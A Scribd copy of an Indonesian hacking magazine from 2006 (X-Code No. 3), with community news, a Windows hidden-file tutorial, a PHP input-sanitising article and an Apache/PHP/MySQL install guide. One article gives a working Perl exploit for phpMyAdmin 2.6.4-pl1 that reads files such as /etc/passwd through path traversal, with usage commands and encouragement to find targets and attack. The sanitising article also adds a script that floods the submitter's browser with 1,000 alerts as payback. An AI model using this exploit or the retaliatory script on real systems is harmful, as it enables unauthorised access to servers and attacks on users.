0% menganggap dokumen ini bermanfaat (0 suara)
30 tayangan129 halaman

X-Code Magazine Edisi 3: Hacking & IT

Xcode Magazine 2
Hak Cipta
© All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai DOC, PDF, TXT atau baca online di Scribd
0% menganggap dokumen ini bermanfaat (0 suara)
30 tayangan129 halaman

X-Code Magazine Edisi 3: Hacking & IT

Xcode Magazine 2
Hak Cipta
© All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai DOC, PDF, TXT atau baca online di Scribd

X-Code Magazine On White paper

No. 3 - Date : 30 Agustus 2006 – Second Edition

X-CODE

Magazine
X-Code Licensi for Article, logo, etc | Computer •
Internet • Hacking

Cara membuka kita membuka akses


keseluruhan dari database,
akses apa jadi nya kalo tempat yang
sangat sakral itu bisa di
keseluruhan buka ??? (► Oleh dokter^cinta)
dari database
Phpmyadmin biasa nya tempat
Attack: Script Artikel Attack tentang Script
Sanitasi Input ini berisi tutor
Sanitasi cara membuat sebuah fungsi
yang akan digunakan untuk
Input men-sanitasi string yang
dimasukkan oleh user.
(► Oleh roninmorgue)

[Link] | [Link] |
[Link]
X-Code Magazine No. 3 dari redaksi
Apa itu Majalah X-Code :
- X-Code magazine adalah majalah komputer, internet dan hacking
dengan
bahasa Indonesia dengan penggunaan Media Murni PDF.

Latar belakang X-Code Magazine :


- Kebutuhan akan informasi, artikel, hacking dan tutor semakin
banyak
sehingga Komunitas memutuskan untuk merilis sebuah
magazine untuk komunitas IT di Indonesia.

Tujuan :
- Memberikan / sharing / berbagi artikel untuk perkembangan ilmu
komputer, internet dan hacking di Indonesia.

Misi :
- Menyebarkan ilmu-ilmu komputer, internet dan hacking untuk
tujuan
positif.

Hak cipta / Licensi :


- Seluruh materi X-Code Magazine dapat didownload, dibaca,
dimodifikasi
serta disebarkan secara bebas untuk tujuan bukan komersial
(nonprofit),
dengan syarat tidak menghapus atau merubah atribut penulis.
- Hak cipta di tangan penulis dan X-Code Magazine dengan
mengikuti
licensi GPL (General Public License)

Distribusi X-Code Magazine :


- Official X-Code Magazine Page :
[Link]
- Mailing list X-Code : [Link] /
[Link]
- Forum phpBB X-Code : [Link]
- Friendster X-Code : yk_family_code@[Link] /
family_server2@[Link].
- CD Yogyafree Pro 7GP 102v atau yang lebih baru.
- Komunitas / media lain yang bekerja sama dengan X-Code
Magazine.

Contact : X-Code Magazine :


- Alamat E-mail Redaksi : yk_family_code@[Link] (Kota
Yogyakarta)
Kata
pengantar
X-Code Magazine No. 3 ahkirnya dirilis pada tanggal 05 Agustus 2006
yang dimana ini lebih cepat dari jadwal rilis yang telah ditentukan,
redaksi mengucapkan terima kasih banyak kepada para donator baik
donator hosting, domain, uang, CD, artikel, logo, wallpaper, voucher
IM3, dan lainnya dimana semua ini salah satu faktor yang membuat
Yogyafree tetap terus eksis dan berkembang sampai saat ini.

Di X-Code Magazine No 3 ditampilkan beberapa artikel, tutorial dan


profile seperti yang direquest oleh beberapa netter, diharapkan di X-
Code Magazine No.
3 ini bermanfaat untuk para pembaca X-Code Magazine
dimanapun berada, kami selaku redaksi X-Code Magazine No. 3
mengucapkan banyak terima kasih atas semua dukungan dari
pembaca sekalian.

Redaksi X-Code Magazine

Team X-Code
Daftar Isi X-Code Magazine No. 3:
1. Perjuangan komunitas di pertengahan tahun Oleh
^family_code^ - Hal 1
2. Cara membuka akses keseluruhan dari database oleh
DOKTER^CINTA
- Hal 4
3. Membuat File Super Hidden oleh Yogie - Hal 8
4. Attack: Script Sanitasi Input oleh roninmorgue – Hal 11
5. Instalasi APACHE, PHP dan MySQL pada system WinXP
Ver 1.1 oleh
n0n4m3 - Hal 17
6. Lupa sandi email Yahoo anda oleh mas’ud (WoNX- Hal 23
7. Belajar dasar Borland C++ Builder dengan 3 tutor oleh
^family_code^ –
Hal 27
8. Hack Website Shopping With [Link] oleh m_beben
– Hal 37
9. Profile Saben founder HitamPutihCrew oleh Saben – Hal 41
10. Prophile On Roninmorgue oleh roninmorgue – Hal 42
11. Profile Mbak Nita Si Progammer (PushM0v) oleh
PushM0v (kata pengantar artikel oleh redaksi) – Hal 46
11. Deface with PHP Bugs oleh m_beben - Hal 48
12. Compilasi dengan LCC dan permasalahannya oleh
^family_code^ – Hal
53
13. Mencari Alamat Target In One Hosting oleh m_beben – Hal
57
14. Teknik Mudah Cracking 4 Software Terbaru
Dachshund Software
Jerman oleh NeMeSiS_ByTe - Hal 62

Penulis X-Code Magazine No. 3 :


- DOKTER^CINTA
- n0n4m3
- roninmorgue
- ^family_code^
- Yogie a.k.a Ple-Q - [Link]
- WoNX
- m_beben
- NeMeSiS_ByTe
- PushM0v (Profile)
Perjuangan komunitas dipertengahan
tahun

Sebelum ahkir bulan Juni 2006, mungkin sudah banyak yang tahu, dari
awal bulan Juni hingga pertengahan bulan Juni 2006, Yogyafree
kesulitan mencari hosting untuk meletakkan webnya sejak hosting di
server dari Hartono tidak jalan untuk web Yogyafree, kemudian
beberapa waktu kemudian T-Koes meminjamkan web servernya untuk
web Yogyafree dan setelah beberapa waktu lamanya ahkirnya hosting
t-koes kehabisan bandwidth juga karena tidak lagi mampu menahan
besarnya kebutuhan bandwidth yang semakin besar untuk Yogyafree,
hal ini sama persis seperti nasib hosting-hosting
Yogyafree sebelumnya.

Ahkirnya beberapa minggu web baru Yogyafree tidak jalan dan


terpaksa menggunakan alternative web lamanya
[Link] salah satu yang kendala yang ada adalah
saat X-Code Magazine No.2 dirilis dan tidak ada tempat hosting yang
kuat untuk meletakkannya saat itu, hingga
tanggal 17 terpaksa ahkirnya di upload di geocities, tapi langsung
cepat down hanya selang beberapa waktu saja dan tidak sedikit
netter yang posting diforum tentang hal ini bahkan sempat beberapa
netter menguploadnya ulang dihostingnya untuk komunitas, tapi hal ini
tidak berlangsung lama, ahkirnya dengan donasi dari pa_k_de dengan
sejumlah uang ahkirnya terbeli juga sebuah hosting, dengan bandwidth
unmetered, sungguh hal yang luar biasa untuk komunitas, karena
donasi tersebut Web kembali normal bahkan materi dan content Web
Yogyafree semakin diperbanyak.

Tapi baru terlepas dari permasalahan hosting, ahkirnya terjadi hal yang
buruk, forum phpBB Yogyafree dibekukan yang
berada di [Link] sebelum forum
Yogyafree dibekukan, forum rekan Yogyafree yaitu HitamPutih
pimpinan Saben yang berada di [Link]
dengan url [Link] juga dibekukan,. Akibat
pembekuan forum Yogyafree memukul komunitas cukup keras, karena
dengan perubahan ini membuat link-link di Web Classic , X-Code
Energy GTS
1
6.0, url forum dari milis dan media lainnya menjadi pincang (url
tidak aktif)
akibat dari pembekuan forum phpBB
ini.

2
Ahkirnya penulis melobi Admin [Link] melalui e-mail
untuk mendapatkan backup Forum phpBB Yogyafree, dengan
melobi beberapa hari ahkirnya penulis mendapatkan backupnya,
terima kasih banyak [Link], ini merupakan hal luar biasa yang
memberikan Yogyafree sebuah kesempatan untuk bangkit dari
kepincangan setelah beberapa waktu lamanya, tapi walau begitu
permasalahan restore menjadi permasalahan tersendiri yang cukup
berat, karena banyak para crew Yogyafree tidak berhasil melakukan
restore termasuk penulis sendiri, setelah sekian waktu
ahkirnya JerryMaheswaraberhasil melakukan restore dan
forumpun kembali seperti semula.

Setelah itu sebenarnya ada beberapa permasalahan teknis terjadi


selama dibulan Juli 2006 dan masa-masa tersebut sangat berat bagi
kami walau tidak ditulis disini detail permasalahan teknisnya, tapi dari
keseluruhan permasalahan teknis ahkirnya berhasil di perbaiki dengan
sangat baik dan seluruh media Yogyafree berjalan dengan normal
kembali bahkan materi-materi web Yogyafree sekarang semakin
diperbanyak dan ditambah medianya, dari keseluruhan hal tersebut
membuat interaksi di komunitas Yogyafree semakin ramai, hal tersebut
terlihat dari lonjakan pesan di mailing list dan penambahan members
yang naik cukup drastis jumlahnya di ahkir bukan Juli 2006, hal ini juga
di forum phpBB setelah berhasil direstore kembali, dari keseluruhan hal
ini membuat seluruh media Yogyafree saat artikel ini ditulis dalam
kondisi optiomal.

Di X-Code Magazine ini kami segenap komunitas mengucapkan terima


kasih sebesar-besarnya terhadap :

- Pa_k_de : Yang telah menyumbangkan uang ratusan ribu untuk


hosting
Yogyafree.
- JerryMaheswara : Yang telah bekerja keras berhari-hari untuk
melakukan restore forum phpBB hingga 2 kali.
- D3DY : Yang telah banyak membantu setting hosting,
membantu forum
dan sebagainya.
- T-koes dan BrainLessChild : Yang telah berjuang keras
membantu
instalasi forum dan sebagainya
- Hartono : Yang telah banyak membantu hosting Yogyafree
diwaktu yang
lalu.
- Semua yang telah membantu Yogyafree yang tidak dapat
disebutkan
satu-satu karena cukup banyak jumlahnya.
3
Terima kasih semua semua kepada yang telah membantu dan
mendukung Yogyafree sehingga mengorbankan banyak waktu, uang
dan tenaga yang tentu tidak sedikit.

4
Yogyafree tetap berjuang, berbagi, sharing bersama dari
komunitas untuk komunitas dan masyarakat IT di Indonesia.

Penulis :

Kurniawan /

^family_code^

5
Cara membuka akses keseluruhan dari
database

made by : dokter^cinta @dalnet, spesial thanks to : My girls and all


my friends on dalnet

greatz to #bruteforce team... @dalnet and ... #indohacking, #mvp,


#antihackerlink, #yogyafree, #binushacker and #jam5 crew, lets rock
in roll
===========================================
================

Phpmyadmin biasa nya tempat kita membuka akses keseluruhan dari


database dan tempat kita membuat,menghapus dan memanipulasi
data jadi phpmyadmin adalah tempat yang sangat rahasia bagi sang
admin nah apa jadi nya kalo tempat yang sangat sakral itu bisa di buka
??? wah... gawat donk...

PERINGATAN ADMIN : PATCH YOUR SERVER NOW!!!

so apa lagi.... Lets rock and roll, sebelum kita melangkah


lebih jauh mari kita analisis di mana lubang untuk kita
susupi ke dalam sistem

6
1. Direktory phpmyadmin biasa nya ada di
[Link] nah apabila direktory itu tidak di
proteksi maka gawat donk jadi biasa nya tempat itu pasti di
password...

7
nah loh gimana kita masuknya??? jangan panik....
lanjut saja
2. file vulnerable yang bisa kita intip maka berdasarkan hal di atas
( duh kek lagi kuliah aja yah formal banget ) , mari kita membuat
exploit sederhana

[dokter@localhost exploit]$ cat > [Link]

#!/usr/bin/perl
use IO::Socket;

# dokter^cinta
# bruteforce team @dalnet
#
# exploit phpMyAdmin 2.6.4-pl1
#
#
# Greatz to all my friends
# thanks for your idea to make this exploit
#
# Contact : [Link][at][Link]
# Website : [Link]
#

if (@ARGV < 3)
{
print "\r\n Modified By: Dokter^cinta @ dalnet\r\n";
print "EXpl01T phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "perl [Link] target /DIR/ FILE\r\n\r\n";
print "target - target dimana ada phpmyadmin contoh: [Link]
print "DIR - Direktori untuk PMA contoh: /phpMyAdmin- 2.6.4-pl1/\r\n";
print "FILE - file untuk di intip ../../../../../etc/passwd\r\n\r\n";
print "contoh cmd: perl [Link] [Link] /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd\r\n\r\n";
print "\r\n Bruteforce Team @dalnet\r\n";
exit();
}

$HOST = $ARGV[0];
$DIR = $ARGV[1]."libraries/grab_globals.[Link]";

8
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".

9
$ARGV[2]. "&subform[1]
[cXIb8O3]=1";
$LENGTH = length $FILE;

print "\r\ntarget adalah: ".$HOST."\r\n\r\n";


$HOST =~ s/(http:\/\/)//;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST",


PeerPort => "80") || die "Error 404\r\n\r\n";

print $get1 "POST ".$DIR." HTTP/1.0\n";


print $get1 "Host: ".%HOST."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n";

print $get1 $FILE;

while ($odp = <$get1>)


{
if ($odp =~ /Warning<\/b>: main\(\): akses ditolak hikz hikz hikz .\/$ARGV[2]
in
/ ) {
printf "\n\nFile ".$ARGV[2]." tak ada om :( .\r\n\r\n";
exit;
}

printf $odp;
}

maka kita cari target yang pake

phpmyadmin lalu apa lagi....??? yah

serang !!!!!!!!!!!!!!!!!!!

[dokter@localhost exploit]$ perl [Link] [Link] /phpMyAdmin-2.6.4-pl1/


../../../../../etc/passwd

target adalah :
[Link] dan good
luck
10
you got their database

11
:P
==========================================
================= WARNING !!!

saya tidak bertanggung jawab atas penyalah gunaan dari


artikel ini dan ini hanya sebagai ilmu pengetahuan belaka
jadi sekali lagi ...
PLEASE DONT TRY THIS AT OTHER PEOPLE
PCS TRY THIS WITH YOUR OWN RISK

DOKTER^CINTA

#BRUTEFORCE @DALNET TEAM...

12
Membuat File Super
Hidden

Asline aku dah pernah bikin tulisan ini, tapi ya karena seperti
yang udah aku ceritakan sebelumnya. Yang websiteku trouble gara-
gara pas lagi proses upgrade mengalami error di tengah jalan. Ya udah
tulisanku ilang semua, dan sekalian pindah rumah (hosting) deh. Jadi
ya sekarang aku jadi blogger pemula lagi.. hehehehe…

Ehm, tentang membuat file Super Hidden ini au tulis lagi karena ada
beberapa yang nanyain tentang gimana cara bikinnya. Padahal kalo
misalnya pada mau coba-coba buka DOS Console dan ketik help pasti
bakalan tau kok jawabannya. Ya udah ga papa wis, aku tilis lagi ya…
here we go..
Pertama kali dapet cara ini gara-garanya komputerku (Win XP) kena
trojan. Biasane kalo cuma virus aja sih file asli yang terinfeksi virus
akan balik lagi ketika virus itu terdeteksi ama antivirus (ntah kalo
skarang). Nah beda ama trojan, yang akan tetep meng-umpet-kan file
yang terinfeksi menjadi file System (aku suka nyebutnya Super
Hidden).

Sekarang gimana nampilinnya? aku kasih contoh ya.. (karena lagi


di kantor, make w2k ya)
Ni aku ada folder yang abis kena trojan dan udah dijadikan Super
Hidden. Nah kalo kita liat di Windows Explorer tu ga bakalan keliatan
meskipun tab show all hidden file udah dicentang. Nah begitu juga kalo
diliat di DOS Prompt.

D:\Ple-Q\Work\Penting>dir
Volume in drive D is DATA
Volume Serial Number is 445E-9DA9
Directory of D:\Ple-Q\Work\Penting
06/13/2006 11:57a.
13
06/13/2006 11:57a..
0 File(s) 0 bytes

14
2 Dir(s) 3,792,273,408 bytes free

Nah padahal di folder itu ada beberapa file. Sekarang aku coba
dengan perintah lain

D:\Ple-Q\Work\Penting>dir /a
Volume in drive D is DATA
Volume Serial Number is 445E-9DA9
Directory of D:\Ple-Q\Work\Penting
06/13/2006 11:57a .
06/13/2006 11:57a ..
05/30/2006 02:08p 89,600 Sinopsis PINK Eps [Link]
06/09/2006 12:06a 973,824 modul [Link]
06/13/2006 11:42a 38,755 logo gajahmada [Link]
3 File(s) 1,102,179 bytes
2 Dir(s) 3,792,273,408 bytes free

Ternyata hanya dengan menambahkan tambahan parameter /a


sudah tampil semuanya.
Tapi apa cuma gitu aja? Ya enggak lah.. khan perintah dir hanya untuk
melihat file aja. Sekarang gimana cara mengembalikan lagi seperti
semula? Nah ketikkan perintah attrib

D:\Ple-Q\Work\Penting>attrib
A SH D:\Ple-Q\Work\Penting\Sinopsis PINK Eps [Link]
A SH D:\Ple-Q\Work\Penting\modul [Link]
A SH D:\Ple-Q\Work\Penting\logo gajahmada [Link]

Nah, keliatan semua deh dia termasuk dalam file apa. Ternyata semua
file didalam folder itu udah berubah jadi SH. (System dan Hidden) atau
bahasa kerennya Super Hidden.. Hehehheehe… udah sekarang gimana
cara balikinnya? kita liat manualnya dulu alias help. Bukankah guru
terdekat kita adalah help dan F1? hihihi kalo linuxers ya man.
hohoho..

D:\Ple-Q\Work\Penting>help attrib
Displays or changes file attributes.

ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [[drive:] [path] filename]
[/S [/D]]

+ Sets an attribute.
- Clears an attribute.
R Read-only file attribute.
A Archive file attribute.
S System file attribute.
H Hidden file attribute.
/S Processes matching files in the current folder
and all subfolders.
/D Processes folders as well.

Hoooo ternyata udah keliatan cara ngembaliin file kita. asiiikkk..


tinggal dicoba nih.. sekalian abis itu dicek apa udah kembali seperti
semula apa belom..

15
D:\Ple-Q\Work\Penting>attrib -s -h “modul [Link]”
D:\Ple-Q\Work\Penting>attrib
A SH D:\Ple-Q\Work\Penting\Sinopsis PINK Eps [Link]
A D:\Ple-Q\Work\Penting\modul [Link]
A SH D:\Ple-Q\Work\Penting\logo gajahmada [Link]

Hurraayyy udah balik.. tuh fileku ya modul [Link] udah nggak


ada label SH-nya. Sekarang kalo misalnya mau ngembaliin semua file
sekaligus gimana? khan pegel juga kalo misalnya harus ngetik
nama file-nya satu-satu? hihihi tenang bro.. kita liat lagi di help.
Ternyata perintah attrib ini mengijinkan untuk melakukan apa yang
kita inginkan. coba ah

D:\Ple-Q\Work\Penting>attrib -s -h /s /d
D:\Ple-Q\Work\Penting>attrib
A D:\Ple-Q\Work\Penting\Sinopsis PINK Eps [Link]
A D:\Ple-Q\Work\Penting\modul [Link]
A D:\Ple-Q\Work\Penting\logo gajahmada [Link]

Yak, dengan menambahkan parameter /s dan /d semua file akan


diproses, tergantung perintah didepannya. hehehehe..
sekarangfile udah aman.. horeeee… cek lagi
ah..

D:\Ple-Q\Work\Penting>dir
Volume in drive D is DATA
Volume Serial Number is 445E-9DA9
Directory of D:\Ple-Q\Work\Penting
06/13/2006 11:57a .
06/13/2006 11:57a ..
05/30/2006 02:08p 89,600 Sinopsis PINK Eps [Link]
06/09/2006 12:06a 973,824 modul [Link]
06/13/2006 11:42a 38,755 logo gajahmada [Link]
3 File(s) 1,102,179 bytes
2 Dir(s) 3,792,273,408 bytes free

Yak.. sudah
selesee….
Sekarang kembali ke judul, gimana cara
bikinnya?
nah kalo misalnya merhatiin cara-cara menampilkan file ya ter-
super-hidden,
harusnya dah bisa bikinnya dong.. coba liat-liat lagi. Atau ketik lagi
help attrib. Aku kasih clue ya.. yaitu tanda plus (+).

Penulis : Yogie a.k.a Ple-Q - [Link]


[Link]

16
Attack: Script Sanitasi Input

koy^k^guy^, anstellwinkel@[Link] , roninmorgue@[Link]

----//
Pengantar

HTML injection, script injection atau apapun istilahnya dari teknik


hacking klasik dengan metode memasukkan kode-kode HTML maupun
JavaScript kedalam field input suatu web based application memiliki
potensi merusak yang cukup besar apabila tidak ditangani dengan
baik...bagi programmer pemula yang tidak banyak mengetahui
fungsi-fungsi yang ada tentu akan menjadi masalah yang cukup
menyusahkan. Disini saya mengambil contoh penggunaan dengan PHP
programming, banyak disediakan fungsi-fungsi untuk mengatasi hal
tersebut...misalnya :

* strip_tags, mysql_escape_string,
htmlentities dll
* menerapkan aturan regular expresion -> preg_match, ereg,
ereg_replace

----// Potensi
Kerusakan

Kerusakan yang dapat terjadi sangatlah berbahaya apabila seorang


penyerang mengetahui kelemahan dari sanitasi input pada aplikasi
web kita, misalnya dengan memasukkan kode-kode HTML dan
JavaScript seorang penyerang dapat merubah tampilan dari aplikasi
kita ataupun mendirect halaman dari aplikasi kita ke alamat
penyerang dan berbagai macam bentuk potensi merusak lainnya.

----// Kelemahan selain HTML


injection

Permasalahan lainnya dari sanitasi input adalah penanganan terhadap


input dari user berupa karakter tanpa spasi, dengan memasukkan
karakter tanpa spasi dalam jumlah yang besar akan menyebabkan
rusaknya tampilan aplikasi web kita...tentu hal ini sangat menyebalkan
17
dan kita tidak menginginkan itu terjadi bukan?? :) dan terkadang saya
juga ingin sedikit membalas tindakan mereka ;)

Setelah kita melakukan sanitasi terhadap kode-kode html maka


diperlukan juga sanitasi terhadap input karakter tanpa spasi yang
dapat merusak tampilan

18
website kita, sekaligus untuk sedikit memberi pelajaran pada
siiseng.. kita buat browser dia untuk looping
sebanyak2nya...OK

----// POC (Proof Of


Concept)

Disini kita akan membuat sebuah fungsi yang akan digunakan untuk
men- sanitasi string yang dimasukkan oleh user,
apabila string tidak bermasalah/mengandung kode-kode dan
maksud yang tidak baik maka data akan diinput kedalam database
aplikasi kita sedangkan jika sebaliknya maka fungsi ini akan
memfilternya dan mem-bypass ke sebuah script yang akan diterima
oleh user yang mengirimkan kode tersebut :)

Langkah-langkahnya adalah sebagai


berikut -->>

1. buat file untuk fungsi mengecek

komentar/teks input [Link]


# 1 <?php
# 2
# 3 function komentar($komentar)
# 4 {
# 5 if(!empty($komentar))
# 6 {
# 7 $bersihKomentar = preg_match("/^[a-z0-9. .,.:.-]+$/i", $komentar); //
mengijinkan alphanumerik
# 8 $ok = explode(" ",$komentar);
# 9 $jml = count($ok);
# 10 for($i=0;$i<$jml;$i++)
# 11 {
# 12 $hal[$i] = strlen($ok[$i]);
# 13 }
# 14 for($i=0;$i<$jml;$i++)
# 15 {
# 16 if (($hal[$i] > 20) || (!$bersihKomentar)) // asumsi jumlah karakter dari
setiap kata > 20 (bisa dirubah)
# 17 {
# 18 $keluar = false;
# 19 break;
# 20 }
# 21 else
# 22 $keluar=true;
# 23 }
# 24 if($keluar==true)
# 25 return $komentar;
# 26 }
# 27 else
# 28 return $komentar;
# 29 if ($keluar==false)
# 30 {
# 31 ?>
# 32 <script>
# 33 var bilangan=1;
# 34 do{
# 35 alert("Kenapa...! Mo coba HAcking Yah...BRoWseR ANda HanG SekAraNG");
# 36 bilangan ++;} 19
# 37 while(bilangan<=1000);
# 38 </script>
# 39 <?
# 40 }
# 41 }
# 42 ?>

--------------------------------------------
eof---------------------------------------

----// Penjelasan
Script

Baris 3 menyatakan kita membuat sebuah fungsi untuk melakukan


sanitasi dari variabel komentar.

Baris 5 membuat suatu kondisi apabila user telah melakukan


input data

Baris 7 melakukan sanitasi terhadap string dengan hanya mengijinkan


karakter alphanumerik

Baris 8 memecah karakter input


berdasarkan spasi

Baris 9 menghitung jumlah kata pada data input utnuk dijadikan


parameter dalam melakukan penelusuran

Baris 12 - 22 menghitung jumlah huruf pada setiap kata dan apabila


ditemukan jumlah huruf > 20 atau ditemukan karakter yang tidak
diijinkan maka akan menciptakan kondisi false, sebaliknya akan
menciptakan kondisi true.

Baris 24 - 25 Jika kondisi true maka data yang akan dimasukkan oleh
user akan dimasukkan kedalam database apa adanya.

Baris 27 - 38 Jika kondisi false maka fungsi akan mem-bypass input dari
user dan mengeksekusi sebuah script yang akan dikirimkan
kekomputer klien/user penyerang. Dalam contoh ini saya membuat
pada komputer user akan muncul kotak peringatan yang harus diklik
1000 x, dan ini akan membuat browser user tidak berjalan
semestinya/hang

----//
Implementasi

2. Sertakan file dan fungsi tersebut pada script


input kita....
20
# 1 <?php
# 2 include "[Link]";
# 3 include "[Link]";
# 4
# 5 if(!$submit) {
# 6 ?>

21
# 7 <form name="form1" method="post" action="">
# 8 <table width="200" border="1">
# 9 <tr>
# 10 <td>Nama</td>
# 11 <td><input name="nama" type="text" id="nama"></td>
# 12 </tr>
# 13 <tr>
# 14 <td>Jabatan</td>
# 15 <td><input name="jabatan" type="text" id="jabatan"></td>
# 16 </tr>
# 17 <tr>
# 18 <tr>
# 19 <td>Komentar</td>
# 20 <td><textarea name="komentar" id="komentar"></textarea></td>
# 21 </tr>
# 22 <td colspan="2"><input name="submit" type="submit" id="submit"
value="Submit"></td>
# 23 </tr>
# 24 </table>
# 25 </form>
# 26
# 27 <?php
# 28 } else {
# 29 connect();
# 30 $periksaNama = strip_tags($nama);
# 31 $periksaJabatan = strip_tags($jabatan);
# 32 $periksaKomentar=komentar($komentar); // menyertakan fungsi sanitasi
komentar
# 33 $query=mysql_db_query($db, "insert into user (nama, jabatan, komentar)
values
# 34 ('$periksaNama', '$periksaJabatan',
'$periksaKomentar')");
# 35 if($query){
# 36 echo "Data Berhasil diinput";
# 37 }else{ echo "Data Gagal diinput"; }
# 38 }
# 39 ?>

--------------------------------------------------
eof-------------------------------------------

Baris 5 - 25 menampilkan form input dengan variabel-variabel tertentu


apabila form dalam kondisi tidak terkirim

Baris 29 - 34 melakukan sanitasi terhadap karakter yang diinput dan


memasukkannya kedatabase apabila bersih dari kode maupun input
yang tidak baik berdasarkan fungsi yang disertakan.

----// Penutup

Artikel ini saya buat sebagai pembelajaran bagi para programmer


pemula (termasuk saya) dalam melakukan sanitasi input, serta
memberi pelajaran bagi user yang bermaksud tidak baik :).

Saya sengaja memasukkan unsur-unsur fungsi sanitasi sebagai


contoh implementasi... serta saya tidak membuat sebuah
kode/script yang dapat
22
merusak balik penyerang aplikasi kita, walaupun itu bisa saja dilakukan
dengan memasukkan kode-kode exploit maupun virus. Ingat kita
bukanlah cracker yang melakukan perusakan.

Algoritma ini dapat diterapkan pada semua jenis scripting


programming, tidak hanya sebatas pada PHP...

Saya tidak bertanggung jawab apabila artikel ini disalahgunakan


untuk sesuatu yang tidak baik,... :)

Salam..... untuk semua x-code staff n


members

---//
Referensi

1. Web Hacking: Serangan dan pertahanannya - Stuart McClure


2. Writing Security Tools and Exploits - James C. Foster ; Vincent
Liu
3. Hackers Handbook - Auzy_build011
4. Professional PHP Programming - Jesus Castagnetto ; Harish
Rawat dkk
4. [Link]
5. Ezine from [Link]

-----------------------------------------------------------------------------

------ Shoutz:
~~~~~
~~

~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion,


WaferStick, newbie, cloud)
~ all forum|members at [Link]-
[Link]
~ mercubuana-
it@[Link] ,
~ x-code staff n members at yogya_family_code,
^family_code^,
~ n for my sweet heart vivi(ede), maaf kalau sering tidak
memperhatikan kamu
(terkalahkan oleh
komputer)...
terima kasih atas semua ketulusan yang kau berikan
23
-----------------------------------------------------------------------------

------- Contact:
~~~~~
~~~

roninmorgue || forum|staff

24
Homepage: [Link]
email:
roninmorgue[at]yahoo[dot]co[dot]i
d
anstellwinkel[at]yahoo[dot]com[do
t]au

----------------------------------- [ EOF ] ----------------------------------------

25
Instalasi APACHE, PHP dan MySQL
pada system WinXP
Ver 1.1 By n0n4m3

Apa itu
APACHE ?
APACHE adalah salah satu program web server yang melayani
permintaan http
(http request) oleh web browser. Contohnya kalau anda
berkunjung ke [Link] maka akan di reply oleh
program web server.

Apa itu
MySQL?
MySQL adalah salah satu program database seperti halnya
dBase, Foxpro, Microsoft ACCESS, dll.

Apa itu
PHP?
PHP adalah salah satu bahasa pemrograman script untuk web. Dengan
PHP kita
dapat menampilkan dan mengolah database MySQL melalui web
browser yang dilayani oleh APACHE.

Dari keterangan diatas ketiga program tersebut saling terkait


dan saling mendukung.

Dengan instalasi dan konfigurasi yang tepat maka ketiga program


diatas akan dapat berjalan terpadu satu sama lain. Tulisan ini menitik
beratkan pembahasan langkah-langkah instalasi ketiga program
tersebut.

Semua langkah instalasi di bawah ini harus dilaksanakan


pada account administrator.

Download
Program
Siapkan ketiga program diatas terlebih dahulu. Anda bisa
mendapatkan
program tersebut secara gratis di internet karena program
26
tersebut program
open
source.

Alamat – alamat ketiga


program :

APACHE [Link]
PHP [Link]

27
MySQL [Link]

Download-lah program untuk versi windows yang terbaru (versi


stable-nya). Disini penulis menggunakan :
apache_2.0.55-win32-x86-
no_ssl.exe
php-5.1.2-
[Link]
mysql-essential-5.0.20a-
[Link]

Instalasi MySQL
• Jalankan program [Link]
untuk mulia instalasi.
• Klik tombol “Next” pada Welcome screen.
• Pilih “Typical” pada Setup Type screen dan klik tombol “Next”
Pilihan “Typical” akan menginstall program MySQL Server dan
Client
Program
s.
Pilihan “Complete” akan menginstall seperti pilihan “Typical”
ditambah dengan file-file C Include dan file-file Lib. File – file ini
diperlukan jika Anda akan menggunakan MySQL bersama dengan
pemrograman bahasa C.
Pilihan “Custom” akan menginstall program sesuai pilihan
Anda saja.
• Klik tombol “Install” pada Ready to Install screen.
• Setelah proses instalasi selesai akan muncul [Link] Sign-Up
screen.
Pilih saja “Skip Sign-Up” jika Anda tidak ingin membuat
account atau
login di website [Link] dan klik tombol
“Next”.
• Pada screen “Wizard Completed” pilih “Configure the
MySQLServer now” dan klik tombol “Finish”.
• Akan muncul screen “Welcome to the MySQL Server
Instance
Configuration Wizard” dan klik tombol
“Next”.
• Pilih “Standard Configuration” dan klik tombol “Next” pada
screen
“Please select a configuration
type”.
• Pada screen “Please set Windows option” aktifkan “Install As
Windows Service”, pilih “Service Name” sesuai versi MySQL ini
yaitu MySQL5, aktiftkan “Launch the MySQL Server

28
automatically” dan “Include Bin Directory in Windows PATH”.
• Aktifkan “Modify Security Settings” dan masukan password
baru di bagian input “New root password” dan input
“Confirm”. Aktifkan “Enable root acess from remote machine”
jika Anda berada pada jaringan komputer dan akan meng-akses
MySQL ini lewat komputer lain. Klik tombol “Next”.
• Klik tombol “Execute” untuk memulai konfigurasi dan
menyalakan server MySQl.
• Setelah konfigurasi berhasil dan MySQL server berjalan klik
tombol
“Finish”
.

29
Untuk memastikan server MySQL telah berjalan tekan tombol CTRL-
ALT-DEL. Cari “[Link]” pada tab Processes. Jika ada berarti
MySQL telah berhasil di instalasi dan telah berjalan pada komputer
Anda.

Instalasi
PHP
• Un-zip file instalasi PHP yang telah Anda dapat diatas. Disini
penulis unzip ke direktori c:\php. Anda bisa saja unzip ke direktori
lain.
• Cari file [Link] dalam direktori c:\php hasil unzip
langkah sebelumnya dan copy-kan ke direktori System
32 dalam folder WINDOWS (c::\Windows\System32).
• Cari file [Link]-dist dalam direktori c:\php hasil unzip
langkah sebelumnya dan copy-kan ke direktori Windows (C:\
Windows) dan rename file ini menjadi [Link]
• Edit file [Link] dengan program notepad atau wordpad. Cari
bagian “extension_dir = "./" ” (untuk mempermudah pakai
fasilitas find dari menu edit) dan ubah menjadi :

extension_dir = "c:\php\ext\"

• Kemudian cari bagian “;session.save_path = "/tmp" “ dan


ganti menjadi:

session.save_path = C:\WINDOWS\TEMP

Perhatikan tanda “ ; ” pada awal session.save_path harus


dihilangkan. Tanda “ ; “ berati remark (catatan) dan bukan
sebagai perintah.

• Cari pada bagian extension “ ;extension=php_mysql.dll “


dan hapus tanda “ ; “ pada bagian awal . Bagian
